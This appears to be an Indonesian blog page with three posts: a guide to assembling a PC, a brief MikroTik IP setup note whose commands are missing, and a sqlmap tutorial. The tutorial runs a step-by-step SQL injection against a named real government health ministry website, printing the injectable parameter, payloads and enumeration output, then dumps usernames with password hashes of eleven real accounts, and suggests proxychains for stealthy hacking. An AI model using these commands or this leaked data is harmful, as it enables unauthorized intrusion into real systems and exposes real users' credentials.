MILK MONKEY

FREE SOFTWARE & DATABASE SOURCE

Total Visitor

Wednesday, July 11, 2012

LANGKAH-LANGKAH MERAKIT PC

  9:31 PM    

Berikut ini akan dibahas mengenai bagaimana cara merakit komputer, terutama bagi mereka yang baru belajar .. dari beberapa referensi yang saya pelajari .. maka berikut ini akan dijelaskan langkah demi langkah cara merakit komputer, mudah-mudahan bermanfaat .. Red. deden
Komponen perakit komputer tersedia di pasaran dengan beragam pilihan kualitas dan harga. Dengan merakit sendiri komputer, kita dapat menentukan jenis komponen, kemampuan serta fasilitas dari komputer sesuai kebutuhan.Tahapan dalam perakitan komputer terdiri dari:
A. Persiapan
B. Perakitan
C. Pengujian
D. Penanganan Masalah
rakit1.jpg

Persiapan
Persiapan yang baik akan memudahkan dalam perakitan komputer serta menghindari permasalahan yang mungkin timbul.Hal yang terkait dalam persiapan meliputi:
  1. Penentuan Konfigurasi Komputer
  2. Persiapan Kompunen dan perlengkapan
  3. Pengamanan
Penentuan Konfigurasi Komputer
Konfigurasi komputer berkait dengan penentuan jenis komponen dan fitur dari komputer serta bagaimana seluruh komponen dapat bekerja sebagai sebuah sistem komputer sesuai keinginan kita.Penentuan komponen dimulai dari jenis prosessor, motherboard, lalu komponen lainnya. Faktor kesesuaian atau kompatibilitas dari komponen terhadap motherboard harus diperhatikan, karena setiap jenis motherboard mendukung jenis prosessor, modul memori, port dan I/O bus yang berbeda-beda.
Persiapan Komponen dan Perlengkapan
Komponen komputer beserta perlengkapan untuk perakitan dipersiapkan untuk perakitan dipersiapkan lebih dulu untuk memudahkan perakitan. Perlengkapan yang disiapkan terdiri dari:
  • Komponen komputer
  • Kelengkapan komponen seperti kabel, sekerup, jumper, baut dan sebagainya
  • Buku manual dan referensi dari komponen
  • Alat bantu berupa obeng pipih dan philips
Software sistem operasi, device driver dan program aplikasi.

rakit2.jpg

Buku manual diperlukan sebagai rujukan untuk mengatahui diagram posisi dari elemen koneksi (konektor, port dan slot) dan elemen konfigurasi (jumper dan switch) beserta cara setting jumper dan switch yang sesuai untuk komputer yang dirakit.Diskette atau CD Software diperlukan untuk menginstall Sistem Operasi, device driver dari piranti, dan program aplikasi pada komputer yang selesai dirakit.
Pengamanan
Tindakan pengamanan diperlukan untuk menghindari masalah seperti kerusakan komponen oleh muatan listrik statis, jatuh, panas berlebihan atau tumpahan cairan.Pencegahan kerusakan karena listrik statis dengan cara:

  • Menggunakan gelang anti statis atau menyentuh permukaan logam pada casing sebelum memegang komponen untuk membuang muatan statis.
  • Tidak menyentuh langsung komponen elektronik, konektor atau jalur rangkaian tetapi memegang pada badan logam atau plastik yang terdapat pada komponen.

rakit3.jpg

Perakitan
Tahapan proses pada perakitan komputer terdiri dari:
  1. Penyiapan motherboard
  2. Memasang Prosessor
  3. Memasang heatsink
  4. Memasang Modul Memori
  5. memasang Motherboard pada Casing
  6. Memasang Power Supply
  7. Memasang Kabel Motherboard dan Casing
  8. Memasang Drive
  9. Memasang card Adapter
  10. Penyelesaian Akhir
 1. Penyiapan motherboard
Periksa buku manual motherboard untuk mengetahui posisi jumper untuk pengaturan CPU speed, speed multiplier dan tegangan masukan ke motherboard. Atur seting jumper sesuai petunjuk, kesalahan mengatur jumper tegangan dapat merusak prosessor.

rakit4.jpg
2. Memasang Prosessor
Prosessor lebih mudah dipasang sebelum motherboard menempati casing. Cara memasang prosessor jenis socket dan slot berbeda.Jenis socket
  1. Tentukan posisi pin 1 pada prosessor dan socket prosessor di motherboard, umumnya terletak di pojok yang ditandai dengan titik, segitiga atau lekukan.
  2. Tegakkan posisi tuas pengunci socket untuk membuka.
  3. Masukkan prosessor ke socket dengan lebih dulu menyelaraskan posisi kaki-kaki prosessor dengan lubang socket. rapatkan hingga tidak terdapat celah antara prosessor dengan socket.
  4. Turunkan kembali tuas pengunci.

rakit5.jpg
Jenis Slot
  1. Pasang penyangga (bracket) pada dua ujung slot di motherboard sehingga posisi lubang pasak bertemu dengan lubang di motherboard
  2. Masukkan pasak kemudian pengunci pasak pada lubang pasak
Selipkan card prosessor di antara kedua penahan dan tekan hingga tepat masuk ke lubang slot.

rakit6.jpg


3. Memasang Heatsink
Fungsi heatsink adalah membuang panas yang dihasilkan oleh prosessor lewat konduksi panas dari prosessor ke heatsink.Untuk mengoptimalkan pemindahan panas maka heatsink harus dipasang rapat pada bagian atas prosessor dengan beberapa clip sebagai penahan sedangkan permukaan kontak pada heatsink dilapisi gen penghantar panas.Bila heatsink dilengkapi dengan fan maka konektor power pada fan dihubungkan ke konektor fan pada motherboard. 
rakit16.jpg
4. Memasang Modul Memori
Modul memori umumnya dipasang berurutan dari nomor socket terkecil. Urutan pemasangan dapat dilihat dari diagram motherboard.Setiap jenis modul memori yakni SIMM, DIMM dan RIMM dapat dibedakan dengan posisi lekukan pada sisi dan bawah pada modul.Cara memasang untuk tiap jenis modul memori sebagai berikut.
Jenis SIMM
  1. Sesuaikan posisi lekukan pada modul dengan tonjolan pada slot.
  2. Masukkan modul dengan membuat sudut miring 45 derajat terhadap slot
  3. Dorong hingga modul tegak pada slot, tuas pengunci pada slot akan otomatis mengunci modul.

rakit7.jpg
rakit8.jpg
Jenis DIMM dan RIMM
Cara memasang modul DIMM dan RIMM sama dan hanya ada satu cara sehingga tidak akan terbalik karena ada dua lekukan sebagai panduan. Perbedaanya DIMM dan RIMM pada posisi lekukan
  1. Rebahkan kait pengunci pada ujung slot
  2. sesuaikan posisi lekukan pada konektor modul dengan tonjolan pada slot. lalu masukkan modul ke slot.
  3. Kait pengunci secara otomatis mengunci modul pada slot bila modul sudah tepat terpasang.
 
rakit9.jpg

rakit10.jpg
  5. Memasang Motherboard pada Casing
Motherboard dipasang ke casing dengan sekerup dan dudukan (standoff). Cara pemasangannya sebagai berikut:
  1. Tentukan posisi lubang untuk setiap dudukan plastik dan logam. Lubang untuk dudukan logam (metal spacer) ditandai dengan cincin pada tepi lubang.
  2. Pasang dudukan logam atau plastik pada tray casing sesuai dengan posisi setiap lubang dudukan yang sesuai pada motherboard.
  3. Tempatkan motherboard pada tray casing sehinga kepala dudukan keluar dari lubang pada motherboard. Pasang sekerup pengunci pada setiap dudukan logam.
  4. Pasang bingkai port I/O (I/O sheild) pada motherboard jika ada.
  5. Pasang tray casing yang sudah terpasang motherboard pada casing dan kunci dengan sekerup.

  
rakit11.jpg
  6. Memasang Power Supply
Beberapa jenis casing sudah dilengkapi power supply. Bila power supply belum disertakan maka cara pemasangannya sebagai berikut:
  1. Masukkan power supply pada rak di bagian belakang casing. Pasang ke empat buah sekerup pengunci.
  2. HUbungkan konektor power dari power supply ke motherboard. Konektor power jenis ATX hanya memiliki satu cara pemasangan sehingga tidak akan terbalik. Untuk jenis non ATX dengan dua konektor yang terpisah maka kabel-kabel ground warna hitam harus ditempatkan bersisian dan dipasang pada bagian tengah dari konektor power motherboard. Hubungkan kabel daya untuk fan, jika memakai fan untuk pendingin CPU.

rakit12.jpg

7. Memasang Kabel Motherboard dan Casing
Setelah motherboard terpasang di casing langkah selanjutnya adalah memasang kabel I/O pada motherboard dan panel dengan casing.
  1. Pasang kabel data untuk floppy drive pada konektor pengontrol floppy di motherboard
  2. Pasang kabel IDE untuk pada konektor IDE primary dan secondary pada motherboard.
  3. Untuk motherboard non ATX. Pasang kabel port serial dan pararel pada konektor di motherboard. Perhatikan posisi pin 1 untuk memasang.
  4. Pada bagian belakang casing terdapat lubang untuk memasang port tambahan jenis non slot. Buka sekerup pengunci pelat tertutup lubang port lalumasukkan port konektor yang ingin dipasang dan pasang sekerup kembali.
  5. Bila port mouse belum tersedia di belakang casing maka card konektor mouse harus dipasang lalu dihubungkan dengan konektor mouse pada motherboard.
  6. Hubungan kabel konektor dari switch di panel depan casing, LED, speaker internal dan port yang terpasang di depan casing bila ada ke motherboard. Periksa diagram motherboard untuk mencari lokasi konektor yang tepat.

rakit13.jpg
rakit14.jpg
rakit15.jpg

8. Memasang Drive
Prosedur memasang drive hardisk, floppy, CD ROM, CD-RW atau DVD adalah sama sebagai berikut:
  1. Copot pelet penutup bay drive (ruang untuk drive pada casing)
  2. Masukkan drive dari depan bay dengan terlebih dahulu mengatur seting jumper (sebagai master atau slave) pada drive.
  3. Sesuaikan posisi lubang sekerup di drive dan casing lalu pasang sekerup penahan drive.
  4. Hubungkan konektor kabel IDE ke drive dan konektor di motherboard (konektor primary dipakai lebih dulu)
  5. Ulangi langkah 1 samapai 4 untuk setiap pemasangan drive.
  6. Bila kabel IDE terhubung ke du drive pastikan perbedaan seting jumper keduanya yakni drive pertama diset sebagai master dan lainnya sebagai slave.
  7. Konektor IDE secondary pada motherboard dapat dipakai untuk menghubungkan dua drive tambahan.
  8. Floppy drive dihubungkan ke konektor khusus floppy di motherboard
Sambungkan kabel power dari catu daya ke masing-masing drive.

rakit17.jpg
9. Memasang Card Adapter
Card adapter yang umum dipasang adalah video card, sound, network, modem dan SCSI adapter. Video card umumnya harus dipasang dan diinstall sebelum card adapter lainnya.Cara memasang adapter:
  1. Pegang card adapter pada tepi, hindari menyentuh komponen atau rangkaian elektronik. Tekan card hingga konektor tepat masuk pada slot ekspansi di motherboard
  2. Pasang sekerup penahan card ke casing
  3. Hubungkan kembali kabel internal pada card, bila ada.

rakit18.jpg

10. Penyelessaian Akhir
  1. Pasang penutup casing dengan menggeser
  2. sambungkan kabel dari catu daya ke soket dinding.
  3. Pasang konektor monitor ke port video card.
  4. Pasang konektor kabel telepon ke port modem bila ada.
  5. Hubungkan konektor kabel keyboard dan konektor mouse ke port mouse atau poert serial (tergantung jenis mouse).
  6. Hubungkan piranti eksternal lainnya seperti speaker, joystick, dan microphone bila ada ke port yang sesuai. Periksa manual dari card adapter untuk memastikan lokasi port.

 
rakit19.jpg
Pengujian
Komputer yang baru selesai dirakit dapat diuji dengan menjalankan program setup BIOS. Cara melakukan pengujian dengan program BIOS sebagai berikut:
  1. Hidupkan monitor lalu unit sistem. Perhatikan tampilan monitor dan suara dari speaker.
  2. Program FOST dari BIOS secara otomatis akan mendeteksi hardware yang terpasang dikomputer. Bila terdapat kesalahan maka tampilan monitor kosong dan speaker mengeluarkan bunyi beep secara teratur sebagai kode indikasi kesalahan. Periksa referensi kode BIOS untuk mengetahui indikasi kesalahan yang dimaksud oleh kode beep.
  3. Jika tidak terjadi kesalahan maka monitor menampilkan proses eksekusi dari program POST. ekan tombol interupsi BIOS sesuai petunjuk di layar untuk masuk ke program setup BIOS.
  4. Periksa semua hasil deteksi hardware oleh program setup BIOS. Beberapa seting mungkin harus dirubah nilainya terutama kapasitas hardisk dan boot sequence.
  5. Simpan perubahan seting dan keluar dari setup BIOS.
Setelah keluar dari setup BIOS, komputer akan meload Sistem OPerasi dengan urutan pencarian sesuai seting boot sequence pada BIOS. Masukkan diskette atau CD Bootable yang berisi sistem operasi pada drive pencarian.
Penanganan Masalah
Permasalahan yang umum terjadi dalam perakitan komputer dan penanganannya antara lain:
  1. Komputer atau monitor tidak menyala, kemungkinan disebabkan oleh switch atau kabel daya belum terhubung.
  2. Card adapter yang tidak terdeteksi disebabkan oleh pemasangan card belum pas ke slot/
LED dari hardisk, floppy atau CD menyala terus disebabkan kesalahan pemasangan kabel konektor atau ada pin yang belum pas terhubung.  Selamat Mencoba dan Semoga Bermanfaat.
 Sumber : www.google.com   

  No Comments

SETTING IP ADDRESS DI MIKROTIK

  9:29 PM    

IP yg akan di setting 192.168.0.1 utk ether1
Setelah login ke dalam mikrotik jalankan perintah di bawah ini:

Maksud dari perintah diatas seperti ini:
Ip address add —-> menambahkan
Address —-> IP yang ingin di tambahkan
Netmask —-> Tambahkan Netmask
Interface —-> Memberi nama ether card
Setelah Perintah diatas dapat dijalankan, untuk melihat hasilnya dapat menggunakan perintah seperti di bawah ini:

Maksud dari perintah diatas seperti ini:
Ip address print —-> untuk mencetak yang sudah di buat sebelumnya
0 —-> Number value
Flags —-> Untuk menunjukkan status interface
X (disabled), I (invalid), D (dynamic)
Address —-> IP yg telah disetting
Network —-> IP yang dapat dipakai dimulai dari 192.168.0.0
Broadcast —-> IP batas akhir 192.168.0.255
Interface —-> Nama interface yang dibuat
Akan dicoba menggunakan ping.

Sebagai contoh untuk men-disable-kan IP yg telah di buat:
disable IP
disable IP
Disini kita akan lihat perubahan yang terjadi pada flags, akan berubah menjadi X yang artinya disable..

Kita lihat menggunakan Ping./

Untuk merubah nama interface dapat menggunakan perintah di bawah Ini:

Maksud perintah diatas adalah:
Interface —> merupakan nama yg akan diganti
set 0 —> karena 0 merupakan number IP yang akan di ganti
name=local —> Mencoba mengganti dari nama ether1 menjadi local
dapat dilihat hasil perubahan nama interfacenya.

  3 Comments

CARA MENGGUNAKAN SQLMAP

  9:26 PM    

qlmap adalah tools untuk melakukan testing penetrasi sql injection pada suatu web, tools ini menurut saya, tools sql injection yang free paling lengkap untuk saat ini, walaupun ada havij, tapi menurut saya havij kurang advanced, havij lebih banyak dipakai oleh newbie newbie, karena memang kegunaan nya yang sangat simple untuk sekali attack sql injection.




saya akan selalu menggunakan flag default –threads dan –random-agent dengan kegunaan :

1--threads : max number sqlmap mencoba untuk membuka concurrent http connections.
2--random-agent : load random user agent dari default sqlmap,
total user agent yang bisa digunakan ialah 2078 random user agent.
1$ wc txt/user-agents.txt
2  2078  23092 198475 txt/user-agents.txt
penggunaan sqlmap secara standart :
1root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "URL" --random-agent --threads X --banner --dbs --tables --columns --dump --dumpall
1. test injeksi dengan men-fetch banner mysql (versi mysql)
01root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 --banner
02 
03   sqlmap/1.0-dev (r4370) - automatic SQL injection and database takeover tool
04 
05http://www.sqlmap.org
06 
07[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
08 
09[*] starting at 22:09:14
10 
11[22:09:14] [INFO] fetched random HTTP User-Agent header from file '/root/sqlmap-dev/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5
12[22:09:15] [INFO] using '/root/sqlmap-dev/output/www.depkes.go.id/session' as session file
13[22:09:15] [INFO] testing connection to the target url
14[22:09:15] [INFO] testing if the url is stable, wait a few seconds
15[22:09:16] [INFO] url is stable
16---8<------ snip
17[22:11:31] [INFO] GET parameter 'folderid' is 'MySQL > 5.0.11 AND time-based blind' injectable
18[22:11:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
19[22:11:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
20[22:11:36] [INFO] testing 'Generic UNION query with Microsoft Access () comment (NULL) - 1 to 10 columns'
21GET parameter 'folderid' is vulnerable. Do you want to keep testing the others? [y/N] n
22sqlmap identified the following injection points with a total of 445 HTTP(s) requests:
23---
24Place: GET
25Parameter: folderid
26    Type: boolean-based blind
27    Title: AND boolean-based blind - WHERE or HAVING clause
28    Payload: option=com_depkesdownload&itemid=21&folderid=51' AND 8184=8184 AND 'TEzv'='TEzv
29 
30    Type: AND/OR time-based blind
31    Title: MySQL > 5.0.11 AND time-based blind
32    Payload: option=com_depkesdownload&itemid=21&folderid=51' AND SLEEP(5) AND 'ISyk'='ISyk
33---
34 
35[22:14:12] [INFO] the back-end DBMS is MySQL
36[22:14:12] [INFO] fetching banner
37[22:14:12] [INFO] retrieving the length of query output
38[22:14:12] [INFO] retrieved: 6
39[22:14:21] [INFO] retrieved: 5.0.45
40web server operating system: Linux CentOS 5
41web application technology: Apache 2.2.3, PHP 5.1.6
42back-end DBMS: MySQL 5.0.11
43banner:    '5.0.45'
44 
45[22:14:21] [WARNING] HTTP error codes detected during testing:
46404 (Not Found) - 198 times
47[22:14:21] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id'
48 
49[*] shutting down at 22:14:21
apa yang saya lakukan pertama kali untuk memfetch banner dari dbms itu penting, karena dengan melakukan injeksi pancingan ke web, sqlmap akan mendapatkan route map dari injeksi website tersebut, sehingga serangan injeksi selanjutnya akan lebih mudah bagi sqlmap.
pada awal injeksi menggunakan sqlmap, disarankan untuk men-fetch banner terlebih dahulu, dengan metode tebak tebak an injeksi ini sqlmap akan lebih gampang membuild road map dari jenis injeksi dbms si website, sekedar sharing saya pernah tidak men-fetch banner terlebih dahulu melainkan langsung dengan metode –dbs, namun hasilnya gagal, ketika dicoba lain kali dengan injeksi –banner sqlmap berhasil men-injeksi web tersebut, dan viola kesana nya pun sqlmap mudah untuk fetch data.
dari hasil injeksi fetch banner mysql, kita mendapatkan positive impact dari target, yaitu keluarnya hasil untuk versi DBMS yaitu : MySQL 5.0.11 dengan tipe injeksi MySQL Blind.
2. fetch user yang digunakan, dan db yang sedang digunakan dengan flag (–current-user dan –current-db)
langkah ke dua ialah analisis user yang dipakai di DBMS dan DB yang sedang digunakan pada website tersebut.
01root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 --current-user --current-db
02 
03--------8<--- snip
04 
05[22:24:23] [INFO] the back-end DBMS is MySQL
06web server operating system: Linux CentOS 5
07web application technology: Apache 2.2.3, PHP 5.1.6
08back-end DBMS: MySQL 5.0.11
09[22:24:23] [INFO] fetching current user
10[22:24:23] [INFO] retrieving the length of query output
11[22:24:23] [INFO] read from file '/root/sqlmap-dev/output/www.depkes.go.id/session': 20
12[22:24:46] [INFO] retrieved: website-in@localhost
13current user:    'website-in@localhost'
14 
15[22:24:46] [INFO] fetching current database
16[22:24:46] [INFO] retrieving the length of query output
17[22:24:46] [INFO] retrieved: 6
18[22:24:55] [INFO] retrieved: portal
19current database:    'portal'
20 
21[22:24:55] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id'
22 
23[*] shutting down at 22:24:55
3. fetch list database yang bisa dihandle oleh user website-in@localhost dengan flag (--dbs)
selanjutnya kita melakukan fetching list database, dengan mengetahui list databse yang lain kita dapat bebas melakukan injeksi pada setiap database yang available untuk di injeksi.
01root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 --dbs
02 
03--------8<--- snip
04 
05[22:36:06] [INFO] the back-end DBMS is MySQL
06web server operating system: Linux CentOS 5
07web application technology: Apache 2.2.3, PHP 5.1.6
08back-end DBMS: MySQL 5.0.11
09[22:36:06] [INFO] fetching database names
10[22:36:06] [INFO] fetching number of databases
11[22:36:06] [INFO] retrieved: 2
12[22:36:08] [INFO] retrieving the length of query output
13[22:36:08] [INFO] retrieved: 18
14[22:36:31] [INFO] retrieved: information_schema
15[22:36:31] [INFO] retrieving the length of query output
16[22:36:31] [INFO] retrieved: 6
17[22:36:40] [INFO] retrieved: portal
18available databases [2]:
19[*] information_schema
20[*] portal
21 
22[22:36:40] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id'
23 
24[*] shutting down at 22:36:40
ternyata hanya 2 database yang avail, yaitu information_schema dan database portal, kita langsung injeksi untuk database portal saja yah, information_schema nya silahkan googling sendiri.
4. fetch list tables di database portal dengan flag (-D portal --tables)
1root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 -D portal --tables
karena log / verbose yang dihasilkan panjang sekali, kita bisa langsung cek hasil dari setiap log injeksi di folder output/web
berikut contoh list tables yang berhasil di injeksi dari database portal, ada 89 tables.
01root@ubuntu:~/sqlmap-dev/output/www.depkes.go.id# cat log
02 
03-----8<---- snip ---
04 
05Database: portal
06[89 tables]
07+------------------------------+
08| jos_assignments              |
09| jos_banner                   |
10| jos_bannerclient             |
11| jos_bannertrack              |
12| jos_categories               |
13| jos_components               |
14| jos_contact_details          |
15| jos_content                  |
16| jos_content_frontpage        |
17| jos_content_rating           |
18| jos_core_acl_aro             |
19| jos_core_acl_aro_groups      |
20| jos_core_acl_aro_map         |
21| jos_core_acl_aro_sections    |
22| jos_core_acl_groups_aro_map  |
23| jos_core_log_items           |
24| jos_core_log_searches        |
25| jos_downloads                |
26| jos_downloads_blob           |
27| jos_downloads_category       |
28| jos_downloads_classify       |
29| jos_downloads_containers     |
30| jos_downloads_file_classify  |
31| jos_downloads_files          |
32| jos_downloads_folders        |
33| jos_downloads_log            |
34| jos_downloads_repository     |
35| jos_downloads_reviews        |
36| jos_downloads_structure      |
37| jos_downloads_text           |
38| jos_groups                   |
39| jos_hwdvidsantileech         |
40| jos_hwdvidscategories        |
41| jos_hwdvidsfavorites         |
42| jos_hwdvidsflagged_groups    |
43| jos_hwdvidsflagged_videos    |
44| jos_hwdvidsgroup_membership  |
45| jos_hwdvidsgroup_videos      |
46| jos_hwdvidsgroups            |
47| jos_hwdvidsgs                |
48| jos_hwdvidslogs_archive      |
49| jos_hwdvidslogs_favours      |
50| jos_hwdvidslogs_views        |
51| jos_hwdvidslogs_votes        |
52| jos_hwdvidsplugin            |
53| jos_hwdvidsrating            |
54| jos_hwdvidsss                |
55| jos_hwdvidsvideos            |
56| jos_jdownloads_cats          |
57| jos_jdownloads_config        |
58| jos_jdownloads_files         |
59| jos_jdownloads_license       |
60| jos_jdownloads_templates     |
61| jos_menu                     |
62| jos_menu_types               |
63| jos_messages                 |
64| jos_messages_cfg             |
65| jos_migration_backlinks      |
66| jos_mod_apotik               |
67| jos_mod_puskesmas            |
68| jos_mod_puskesmas15072011    |
69| jos_mod_puskesmas24112010    |
70| jos_mod_puskesmas_23012011   |
71| jos_mod_puskesmas_old        |
72| jos_mod_rumah_sakit          |
73| jos_modules                  |
74| jos_modules_menu             |
75| jos_newsfeeds                |
76| jos_permissions              |
77| jos_phocadownload            |
78| jos_phocadownload_categories |
79| jos_phocadownload_licenses   |
80| jos_phocadownload_sections   |
81| jos_phocadownload_settings   |
82| jos_phocadownload_user_stat  |
83| jos_plugins                  |
84| jos_poll_data                |
85| jos_poll_date                |
86| jos_poll_menu                |
87| jos_polls                    |
88| jos_rokdownloads             |
89| jos_rokversions              |
90| jos_sections                 |
91| jos_session                  |
92| jos_stats_agents             |
93| jos_swmenufree_config        |
94| jos_templates_menu           |
95| jos_users                    |
96| jos_weblinks                 |
97+------------------------------+
5. fetch isi kolum pada setiap tables dengan flag (--columns)
setelah itu mari kita ke final step pada setiap langkah langkah menginjeksi suatu web, yaitu memfetch isi dari tables. karena tabel yang menarik dari list diatas yaitu tabel users, maka langsung kita fetch isi tabel tersebut
sebelumnya kita fetch dulu list kolum pada tabel tersebut, dan fetch data dari kolum hanya yang penting saja, kita fetch dengan flag (-D portal -T jos_users --columns)
01root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 -D portal -T jos_users --columns
02 
03----8<----snip
04 
05+---------------+---------------------+
06| Column        | Type                |
07+---------------+---------------------+
08| activation    | varchar(100)        |
09| block         | tinyint(4)          |
10| email         | varchar(100)        |
11| gid           | tinyint(3) unsigned |
12| id            | int(11)             |
13| lastvisitDate | datetime            |
14| name          | varchar(255)        |
15| params        | text                |
16| password      | varchar(100)        |
17| registerDate  | datetime            |
18| sendEmail     | tinyint(4)          |
19| username      | varchar(150)        |
20| usertype      | varchar(25)         |
21+---------------+---------------------+
22 
23[02:39:42] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id'
24 
25[*] shutting down at 02:39:42
sekarang kita akan men-fetch hanya isi dari kolum (username, dan password), dengan flag (-D portal -T jos_users -C username,password --dump), flag --dump berguna untuk men-dump isi dari kolum kedalam log sqlmap sehingga bisa kita liat secara permanen di hardisk tanpa melakukan injeksi ulang (logging)
1root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 -D portal -T jos_users -C username,password --dump
hasil yang terlog di folder log/web
01root@ubuntu:~/sqlmap-dev# cat output/www.depkes.go.id/log
02 
03----------8<----snip
04 
05Database: portal
06Table: jos_users
07[11 entries]
08+-------------------------------------------------------------------+---------------+
09| password                                                          | username      |
10+-------------------------------------------------------------------+---------------+
11| 35d1b3c70e13825c0d4a67843adbf6ef:sQEMDKp8NKGSLMMKP5DocOSMwO1uCV3l | admin         |
12| f45161dd4038a5946c1dbcc59dbc0d6a:JUYQ0bIg2mt0XrIotHzVRw4yTowVCgIi | andri         |
13| 06b60c7bbdd5e197810d9018c3640ccd:MXghhJp9fJc8uadkcrZC30dZhyn3JnK7 | dewi_roro     |
14| 1e41bc000f1461a1410823fcdd7f0c22:eNKOmRJO35Mxa5PqI8jJAxAR7mN4qPxO | ipunk         |
15| 30f9ade9382291ffaf41ba0e35fa54ca:EOnhJGXlt5LLl0cefNLleOYQ8OCCgloc | ismail        |
16| d8c27e4de63a2c48e4a66ec8d88160c8:I30jspHGk6lPca18gwX1k069vqopqnoc | isti          |
17| faf5fc5f3d5901d79a396c62cacdc639:dRzIfNbjgAkj5Bco281VE1y6PiaKQLLa | Miemie Widya  |
18| 42fac0d700127746caac2c225b1f0427:pGFxjurnXno3dLMZMxwhdGe65NsI0zDl | puskom        |
19| d7c49e113aca936ed03c452c71784e7b:7mABDrLJBxFSbLyiDTcCi2Xr5agcxeGc | rsud meureudu |
20| 27a94db23c3d203edbcd7314a998bf9e:R3x0ypx8lbe7yrAylDbixbf0pDdZ2KDb | silver        |
21| 50a09da3b0d90b736e939862ef565c4d:YGJbFZxWVEayGlylKuyLvmY5wadgQy5K | supriyono     |
22+-------------------------------------------------------------------+---------------+
adapun csv dari hasil dump ada berada di subfolder dump di setiap folder log web tersebut

untuk melakukan full dump satu kolum bisa menggunakan flag (-D portal -T jos_users --columns --dump) namun isinya berantakan dikarenakan banyak jumlah kolum, jadi lebih baik kita fetch kolum yang dianggap perlu saja, berikut dari hasil full dump untuk tabel jos_users : jos_users.txt
hal terbaik dari teknik sql injection menggunakan tools ialah jika digabungkan dengan tools proxychains, yang akan menghasilkan tools hack website yang stealth, powerfull namun sederhana.
Enjoy..

  No Comments

Subscribe to: Posts (Atom)